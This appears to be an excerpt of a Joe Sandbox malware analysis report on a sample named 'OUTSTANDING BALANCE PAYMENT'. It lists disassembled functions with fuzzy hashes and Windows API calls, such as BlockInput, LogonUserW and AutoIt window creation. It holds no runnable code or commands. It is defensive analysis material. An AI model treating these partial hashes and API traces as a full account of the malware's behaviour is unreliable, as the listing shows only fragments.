                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                  • String ID:
                                                                  • API String ID: 81990902-0
                                                                  • Opcode ID: 904d856231f7cc451c8f7162e2520e2a604183ec0ecfa367ab39df9f71d8b19b
                                                                  • Instruction ID: 330b4a95fbcd2d27c68f91fb81409627bc444ec2162a0e53edac6e24e2679a64
                                                                  • Opcode Fuzzy Hash: 904d856231f7cc451c8f7162e2520e2a604183ec0ecfa367ab39df9f71d8b19b
                                                                  • Instruction Fuzzy Hash: ECE0E675010511AFEB662F54FD05D777BEDEF04320B11C569F49AC1470DB625CA0DB50
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,002A6DB3,-0000031A,?,?,00000001), ref: 002A81B1
                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 002A81BA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: d6947f1e2634d85dac29f269a0f94a69b07e9328e5b32b3ca68bc966bb6ebb71
                                                                  • Instruction ID: ea10b86ec4a792d74e9e08712fd5f0936d225d31aab35f9e72bd5cb4c9b01077
                                                                  • Opcode Fuzzy Hash: d6947f1e2634d85dac29f269a0f94a69b07e9328e5b32b3ca68bc966bb6ebb71
                                                                  • Instruction Fuzzy Hash: 46B09235045608ABDB022BE1EC19B597FACEB08752F004092F60D440618B7254108A92
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                   • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8265a2d6f0c6005a34d767919353e5cc8e5b046c379be2064e4cee5cc807466c
                                                                  • Instruction ID: 906281ecb87d0361a6ef704569efc9ebb5d5691a23ff3eb141200e3971010410
                                                                  • Opcode Fuzzy Hash: 8265a2d6f0c6005a34d767919353e5cc8e5b046c379be2064e4cee5cc807466c
                                                                  • Instruction Fuzzy Hash: B632E521D39F424ED7235634D822336A29DAFBB3D4F15D727E81AB5DA6DF29C4934100
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                   • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: __itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 674341424-0
                                                                  • Opcode ID: c69b45f11cfe094bae981c7c46351011fee833c685ee075107aa0f4ba45d369d
                                                                  • Instruction ID: 61ce9f121dcf47529579bfc7e1aaf598f977a8c5680ad38b22e12ddd2064cc62
                                                                  • Opcode Fuzzy Hash: c69b45f11cfe094bae981c7c46351011fee833c685ee075107aa0f4ba45d369d
                                                                  • Instruction Fuzzy Hash: 0D22DB756293019FD724EF14C890B6FB7E4AF84350F24492DF99A87291DB71E8A4CF82
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                   • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b9a1bf01560231fd7b93e70381fc06ea8820d3d5a64929331f133395b6481a3c
                                                                  • Instruction ID: 94839e92abeb6c6e21cede436479c2518ed139bb76ebdbf659e27bfc2c43811d
                                                                  • Opcode Fuzzy Hash: b9a1bf01560231fd7b93e70381fc06ea8820d3d5a64929331f133395b6481a3c
                                                                  • Instruction Fuzzy Hash: 35B1CD20D2AF418DD62396398871336B65CAFBF3D5F92D71BFC2A74D62EB2185934180
                                                                  APIs
                                                                  • __time64.LIBCMT ref: 002CB6DF
                                                                    • Part of subcall function 002A344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,002CBDC3,00000000,?,?,?,?,002CBF70,00000000,?), ref: 002A3453
                                                                    • Part of subcall function 002A344A: __aulldiv.LIBCMT ref: 002A3473
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                   • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Time$FileSystem__aulldiv__time64
                                                                  • String ID:
                                                                  • API String ID: 2893107130-0
                                                                  • Opcode ID: 9162866a0190b064a01673967f011ce1fd7f1a6dda06c9867f15ac1b4fc60e27
                                                                  • Instruction ID: a8778b08575c6de24fe1f5d7e0afacfbba1ea6c0b8ee481b76ec18ef1ee122d5
                                                                  • Opcode Fuzzy Hash: 9162866a0190b064a01673967f011ce1fd7f1a6dda06c9867f15ac1b4fc60e27
                                                                  • Instruction Fuzzy Hash: 2321A2766345108BC72ACF28C481B92B7E5EB95310F248E6DE4E5CF2C0CB74B915CB54
                                                                  APIs
                                                                  • BlockInput.USER32(00000001), ref: 002D6ACA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                   • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: BlockInput
                                                                  • String ID:
                                                                  • API String ID: 3456056419-0
                                                                  • Opcode ID: da2c57ad4117568a3934af36b2e09690a7cbdc2caff6182d1d4806afa91b3cc0
                                                                  • Instruction ID: faed26ddebe500ae413d6add790bd4887ff93e97dd9c6aa8795f4f9b0ff4659c
                                                                  • Opcode Fuzzy Hash: da2c57ad4117568a3934af36b2e09690a7cbdc2caff6182d1d4806afa91b3cc0
                                                                  • Instruction Fuzzy Hash: 5DE01239220204AFC700EF99D404956B7EDAF64751F058417E945D7391DAB0E8148B90
                                                                  APIs
                                                                  • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 002C74DE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: mouse_event
                                                                  • String ID:
                                                                  • API String ID: 2434400541-0
                                                                  • Opcode ID: f31c771bf82c47a40cbfd39b5f9d5c10aceb6744b13ca46b52aaf12153620da7
                                                                  • Instruction ID: 9dabd9374b59b68c38401dbeac84ce9b14a57b18fe2a79382d0db31b2a4cd967
                                                                  • Opcode Fuzzy Hash: f31c771bf82c47a40cbfd39b5f9d5c10aceb6744b13ca46b52aaf12153620da7
                                                                  • Instruction Fuzzy Hash: CAD05EA013C70639EC3D0B24CC1FF760928F3107C1F80838DB482C90C1B8C058259C32
                                                                  APIs
                                                                  • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,002BAD3E), ref: 002BB124
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: LogonUser
                                                                  • String ID:
                                                                  • API String ID: 1244722697-0
                                                                  • Opcode ID: 45821235f2d1dfcce9db11ff95dccbfd933ea9cdd23b79079f00d79f6211c6e5
                                                                  • Instruction ID: a6919e0cc2b15fd82710428980f8ff88f9b0d6f2ac72e01e1c8702976543c267
                                                                  • Opcode Fuzzy Hash: 45821235f2d1dfcce9db11ff95dccbfd933ea9cdd23b79079f00d79f6211c6e5
                                                                  • Instruction Fuzzy Hash: 01D09E321A464EAEDF025FA4DC06EAE3F6AEB04701F448511FA15D50A1C675D531AB50
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: NameUser
                                                                  • String ID:
                                                                  • API String ID: 2645101109-0
                                                                  • Opcode ID: 8b4d804d24824abfe17ec29112e99cdc15a11399f65b7a3a2c49aad0e4784b51
                                                                  • Instruction ID: 4d19ee45f7c48a092bd4e8db2e383c2d2e40ffe90698e478fa0917dc1fdd6c5a
                                                                  • Opcode Fuzzy Hash: 8b4d804d24824abfe17ec29112e99cdc15a11399f65b7a3a2c49aad0e4784b51
                                                                  • Instruction Fuzzy Hash: 3FC04CF141114DDFD752CBC4C9449EEB7BCAB04301F1040929249F1110D7709B459B72
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 002A818F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: 686a29d70e1220cb719b72122d77d11e6f13c5c0f8bab81302122c40fa434df4
                                                                  • Instruction ID: fdbf1e79df9dd8a7cf2486451cbabb6283267b82ba1fb5d12be198e135988e5a
                                                                  • Opcode Fuzzy Hash: 686a29d70e1220cb719b72122d77d11e6f13c5c0f8bab81302122c40fa434df4
                                                                  • Instruction Fuzzy Hash: E5A0113000020CABCF022B82EC088883FACEA002A0B0000A2F80C000208B22A8208A82
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 39c7abd227d3bcc20cdb96fbc4d1a097f170c0eeb2d33b7b1a3b607e8a36ba2e
                                                                  • Instruction ID: 28a2ffbfbbfc8c0f80e6d5dfff4d6a03d0d7eae4f2010a538f1cdd83ffbf281a
                                                                  • Opcode Fuzzy Hash: 39c7abd227d3bcc20cdb96fbc4d1a097f170c0eeb2d33b7b1a3b607e8a36ba2e
                                                                  • Instruction Fuzzy Hash: C3126C74A11609EFDF04EFA4D985AAEF7F9FF48300F148529E406E7290EB35A964CB50
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 413f76cb204a5fd635601260efdbffada7e97813931b3e6247d9c8a15014dabd
                                                                  • Instruction ID: ae9b893943f707b12a374a95eac62999237fd019b58e41c0339acaf23227abbc
                                                                  • Opcode Fuzzy Hash: 413f76cb204a5fd635601260efdbffada7e97813931b3e6247d9c8a15014dabd
                                                                  • Instruction Fuzzy Hash: 9312D078A2121ACFDF24EF54C480ABEF7B0FF14314F168069D94A9B391E375A961CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Exception@8Throwstd::exception::exception
                                                                  • String ID:
                                                                  • API String ID: 3728558374-0
                                                                  • Opcode ID: 766cbe18f5d28bda4818cee0c8c3cacbe26879608481d5d573a6f47cba64c924
                                                                  • Instruction ID: 530ae8ee26e92a527d600efaa4952e2b929affd34b2e3fc7904b9b702420063b
                                                                  • Opcode Fuzzy Hash: 766cbe18f5d28bda4818cee0c8c3cacbe26879608481d5d573a6f47cba64c924
                                                                  • Instruction Fuzzy Hash: 6102C270A21109DFCF05EF64D981ABEB7B5FF44300F108069E906EB295EB35DA25CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                  • Instruction ID: 739a82e03d5368a7e4446a6b3d61b1addae6162336915c59934f132fd2aeae5d
                                                                  • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                  • Instruction Fuzzy Hash: 5EC1B7322251930BDFAD4A3985B443EFBA15A92BB531A076DD8F3CB4D6EF20C534D620
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                  • Instruction ID: ac24a0d548214e3dbd7a0a7655e5299f07088048a6633acf032d933b5d260a1e
                                                                  • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                  • Instruction Fuzzy Hash: 9DC1A4322251930ADFAD4A39C5B453EFAA15AA3BB131A076DD4F3CB4D6EF20D534D620
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                  • Instruction ID: d7b8d25ada23ca830a479bbc31dcf8845e2469d58cc6fa556d268eb6c746146c
                                                                  • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                  • Instruction Fuzzy Hash: D3C1C3322251930ADFAD8A3AC57453EFAA15AA27B131A077DD4F3CB4D6EF20C574D620
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                  • Instruction ID: 6405be58ae10bc317b3f93ebff3430fbdd294476933ddfc1c57d4b11ac83d97f
                                                                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                  • Instruction Fuzzy Hash: 9AC1A33222519309DFED4A39C67443EBAA15EA2BB531A077DD4F2CB5D6EF20C534D620
                                                                  APIs
                                                                  • DeleteObject.GDI32(00000000), ref: 002DA2FE
                                                                  • DeleteObject.GDI32(00000000), ref: 002DA310
                                                                  • DestroyWindow.USER32 ref: 002DA31E
                                                                  • GetDesktopWindow.USER32 ref: 002DA338
                                                                  • GetWindowRect.USER32(00000000), ref: 002DA33F
                                                                  • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 002DA480
                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 002DA490
                                                                  • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002DA4D8
                                                                  • GetClientRect.USER32(00000000,?), ref: 002DA4E4
                                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 002DA51E
                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002DA540
                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002DA553
                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002DA55E
                                                                  • GlobalLock.KERNEL32(00000000), ref: 002DA567
                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002DA576
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 002DA57F
                                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002DA586
                                                                  • GlobalFree.KERNEL32(00000000), ref: 002DA591
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002DA5A3
                                                                  • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0030D9BC,00000000), ref: 002DA5B9
                                                                  • GlobalFree.KERNEL32(00000000), ref: 002DA5C9
                                                                  • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 002DA5EF
                                                                  • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 002DA60E
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002DA630
                                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002DA81D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
